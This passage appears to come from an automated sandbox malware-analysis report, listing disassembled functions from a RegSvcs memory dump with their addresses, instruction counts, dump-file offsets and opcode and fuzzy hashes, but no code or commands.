                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                              • Instruction ID: 11a565f70b963dbd7b1b5ae44a3b0c653d0f7cfbf62d9948fd8c1d635804f1cc
                                                              • Opcode Fuzzy Hash: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                              • Instruction Fuzzy Hash: 05118B32241642EFDB26EF19DD90F56BBB8FF94B84F200465E9059F6A1C335ED01CA90
                                                              Function 01596259 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                              • Instruction ID: 3e0ce2132b0b441314d494eaa515cce3b17e2f48f1a5f11f8c53a54873b2afaa
                                                              • Opcode Fuzzy Hash: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                              • Instruction Fuzzy Hash: 79115A7054122AABEF75AB68CD52FEDB2B4BF44714F5041D4A318AA0E0DA709E85CF85
                                                              Function 01616050 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                              • Instruction ID: 126f12304e87d594da8e2985f474b2421af066d83c607673305fd8bab4a8e102
                                                              • Opcode Fuzzy Hash: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                              • Instruction Fuzzy Hash: 4E11177790001AABCB21DB94CC80DEFBB7CFF48254F044166E906A7211EA34AA55CBA0
                                                              Function 0159208A Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction ID: 72025ccc691f7d8ea476506068ff067f2b97143a58f9cc6de9fa1d3f5a44a081
                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction Fuzzy Hash: 86014733601211ABEF159E6DD884B9AB7ABBFC4700F5544AAED058F246EE71CC81C391
                                                              Function 01626500 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                              • Instruction ID: efd0229e3c0eb6e0e217b7c598d5b3f2962bf651f18c81ee8a863f61fcffd69d
                                                              • Opcode Fuzzy Hash: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                              • Instruction Fuzzy Hash: 4711A1326445569FD711CF68D800BA6BBB9FB9A314F08C159ED499F315D732EC81CBA0
                                                              Function 0161C810 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                              • Instruction ID: ab8f59d0478a38fb732fcadaf482233f096107b8021dcf6fcf9867b6b18e834c
                                                              • Opcode Fuzzy Hash: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                              • Instruction Fuzzy Hash: 0F111CB1A0020ADBCB00DF99D585A9EBBF4FF58250F14406AA905E7351D674EA018BA4
                                                              Function 0163EA60 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                              • Instruction ID: cbd58ce1859913511a51ca98b5a7b279321b30e7498ceb5a7f0fe6ff7ee2bfbb
                                                              • Opcode Fuzzy Hash: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                              • Instruction Fuzzy Hash: B9017135580212ABC732AE19CC5097BBBB9FFD2650B45842AE945AF711DB22DC43CBA1
                                                              Function 0158C020 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction ID: 8c878b7419840832ebbbfcd784b3c763320543ef879aba43c4fa0da816c5fecc
                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction Fuzzy Hash: A201B532500706DFEB26AAAAC844AABB7F9FFC5654F04481EA9469F540DE70E402CB60
                                                              Function 015D20F0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                              • Instruction ID: 37816373825f99689badd9dd585113fdf17ff4cdf775bbac5802cca35bc6565b
                                                              • Opcode Fuzzy Hash: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                              • Instruction Fuzzy Hash: 28112D75A0120DEBDB15DFA8CC51AAE7BB5FB84694F008099E9059B290D635AE11CB90
                                                              Function 015CE5CF Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                              • Instruction ID: 6d28502f2679fd6c62591fc5a90d87c1d8f1ab26f535678d45e01fa96907892e
                                                              • Opcode Fuzzy Hash: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                              • Instruction Fuzzy Hash: 1D0184B1691902BFD251BB69CD81E5BBBECFF99654B400629B1098BA51DB24EC01C6A0
                                                              Function 016269C0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                              • Instruction ID: 8819c2c18be742037dd3091dbd20382b5cd7009c05aba803b3a043032ab04d6b
                                                              • Opcode Fuzzy Hash: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                              • Instruction Fuzzy Hash: 2901FC32214616DBC320DF6ECC4896BFBA8FF94660F114229ED598B2D0E7309911CBD1
                                                              Function 0161C460 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                              • Instruction ID: 004db199c1632c4f2e2d3b323b245ccf595c1580f9f9f45a60fe6867c682e182
                                                              • Opcode Fuzzy Hash: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                              • Instruction Fuzzy Hash: BB115B75A41209EBDB15EFA8C844EAE7BB6FB98250F044059F90197354DA34E911CB90
                                                              Function 0161C97C Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                              • Instruction ID: 7609dc94053ea57eef1e0da4320d136c7d2bccbf7bb5fb141e75a628469b28aa
                                                              • Opcode Fuzzy Hash: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                              • Instruction Fuzzy Hash: 941179B16083099FC710DF69C84195FBBE4FF98310F00891AB998DB3A0E630E900CB92
                                                              Function 0161CA11 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                              • Instruction ID: 3252bc532f6a6d86ade8d1d3e23a14b6a829ba1b833499f0f6aceaa886fc9b1d
                                                              • Opcode Fuzzy Hash: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                              • Instruction Fuzzy Hash: 551179B26083099FC310DF6DC84194FBBE4FF99350F00851AB958DB3A4E630E900CB92
                                                              Function 01664A80 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: 6c9f5be33d57c693e3ba68d71a367c699ebfa2e4885fefd750d467bceedb73bd
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: 4601D432200602EFD7219AADDC44F9ABBEEFBC6210F044819EA428B754DEB0F841C794
                                                              Function 015AE016 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: a3a7aa74c07b9d7af6f05b577064662136f123f6360b54473625999e5cbb022a
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: B9017832680681DFE326861DC948F2EBBE8FB88794F4904A1FA05CF6A1D678DC40C661
                                                              Function 0158826B Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                              • Instruction ID: 6cc030d491305e450f8b05f5bb72dabfaa3385787f30fbe58d59d3b01a98685d
                                                              • Opcode Fuzzy Hash: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                              • Instruction Fuzzy Hash: 6D018431700A09DBDB14FB69DC149AE77E9FF81610B594169DA02BF644EE20DD01C794
                                                              Function 0163EB50 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                              • Instruction ID: 4db9de742a750e5a2d4baec6db52aa9a223a150fe81323f3aca4c333af119f5c
                                                              • Opcode Fuzzy Hash: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                              • Instruction Fuzzy Hash: 62018F71680602AFD3366F19DD41F16BAA8AF95F50F01442AE2069F390D7B1D8418B68
                                                              Function 01592582 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                              • Instruction ID: 44492d2ceaf5e4fe2fd048af4741ce7187c71b1960e4ba66756c8eb646af87c0
                                                              • Opcode Fuzzy Hash: c5627a8807f7a18b5f5d39fe5a6447a6c7c13f77749067a136d8055bf3c80c33
                                                              • Instruction Fuzzy Hash: 83F0A932A41711BBC731DB568D50F5BBEA9FFC4B90F154429A6059F640DA30DD01C6A1
                                                              Function 015BC073 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: ec5709b8e8d06f22214f30a710943d5235413cc96c4b33a7a736e5ecfbc925c8
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: 9DF062B2600615ABD334CF4DDC40E5BFBEAEBD5A90F058169A655DB220EA31ED05CB90
                                                              Function 0158C310 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 47b808f967b7de3f08240f374ba88e28acbe6445d1a4b40ea57335f3e7e289f4
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: 49F0FC73244623ABD73236598840BAFB9D5BFE1A64F1A0035E205BF240CD648D0396F0
                                                              Function 015CCA6F Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: b1254094f2ea8d9aebf6e383ecf6f748c5bba85fa3f2e2584f973bd6e9122f30
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: 2D01A231601685AFD327DA9DCD09B5EBB98FF51B54F094469FA488F7A1D7A4C800C251
                                                              Function 016661E5 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                              • Instruction ID: 966dd5d5ac826c09ba6a55dba2f2a1430372830a4ba0bf20db5be4207e41a811
                                                              • Opcode Fuzzy Hash: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                              • Instruction Fuzzy Hash: 5E014F71A0024AEBDB14DFA9E845AEEBBF8BF58314F14405AE501BB390D774EA01CB95
                                                              Function 016163C0 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: 3fcf55d92ac92e28293a5e81589c798b1b60c854bc7449f00967924c6c8e5a91
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: A0F0F97220001EBFEF019F95DD80DAF7B7EFB99298B144125FA1196160D671DD21ABA0
                                                              Function 0161A4B0 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                              • Instruction ID: 14c5b314d34cdd41e0af1a91eaece8d08b773bd5f13592661311feee7b91f8db
                                                              • Opcode Fuzzy Hash: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                              • Instruction Fuzzy Hash: 17018936105149EBCF129E94DC40EDE7F66FB4C754F098205FE1966224C736D971EB81
                                                              Function 0158C0F0 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                              • Instruction ID: a5a6e15789e29eddcf7423360b0723a4b3ec04de62c4fbf73df7568bac72b3e7
                                                              • Opcode Fuzzy Hash: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                              • Instruction Fuzzy Hash: A8F024716142425BF714B6299C81BA332DAF7E4754F25846AEB099F2C1E970DC0183F4
                                                              Function 015C656A Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                              • Instruction ID: bd4793aba174694b5354ea48b8f623765206a07d90f5be9a2959a0905b55ea6a
                                                              • Opcode Fuzzy Hash: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                              • Instruction Fuzzy Hash: 3701A470240682DFF3379FACCD48B2A77E4BB54F44F980598BA018F7DADB68D5018614
                                                              Function 0163437C Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: 9e8200905a20c2269d5b47346d29558f5b820e4f1fbe1e005126a7d14914af1b
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: DDF0E231B81A234BFB36AA2F8C20B2EEA96AFD0E40B05052C9611CB780DF20DC018780
                                                              Function 0161E872 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: d2cd73ffa624666e99a351d539025162e6d293e6f9bc20b6787d1d6fddddb455
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 03F0B432B505129FD3628A4DDC80F16B769BFD5A60F5E0024AE049B368C361EC0287D0
                                                              Function 0161C89D Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                              • Instruction ID: 51a09b4c9239cc714d3622adffffa39f085d2ef23a9b601be5dad0e5204d0857
                                                              • Opcode Fuzzy Hash: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                              • Instruction Fuzzy Hash: 0CF0AF706153059FC360EF69C845A1EBBE4FF98710F44465ABC98DB394E634E901C796
                                                              Function 015C0854 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction ID: 4c3e4f3ae58da589689acd0e66e9a0ce77d5d964f2e63558a31c37f2eebed15e
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: 6EF09072610205EEE714DF65CC01F56B6E9FF98740F14C468A545DB1A4FAB0DD01C654
                                                              Function 01618D20 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae7b8a48e0687c574ad77719f47bf6de375ab46b27c1ff1a88a37a57f11371a4
                                                              • Instruction ID: 9fa862f2d76f53934eee17a913aa769931317c3fd7549b23c85f6314d1d3483d
                                                              • Opcode Fuzzy Hash: ae7b8a48e0687c574ad77719f47bf6de375ab46b27c1ff1a88a37a57f11371a4
                                                              • Instruction Fuzzy Hash: 6DF0B4339103446BD7317A1CAC54B5BBB6DFBD4724F8D5615F94A2B3258B306C90D780
                                                              Function 0161C912 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
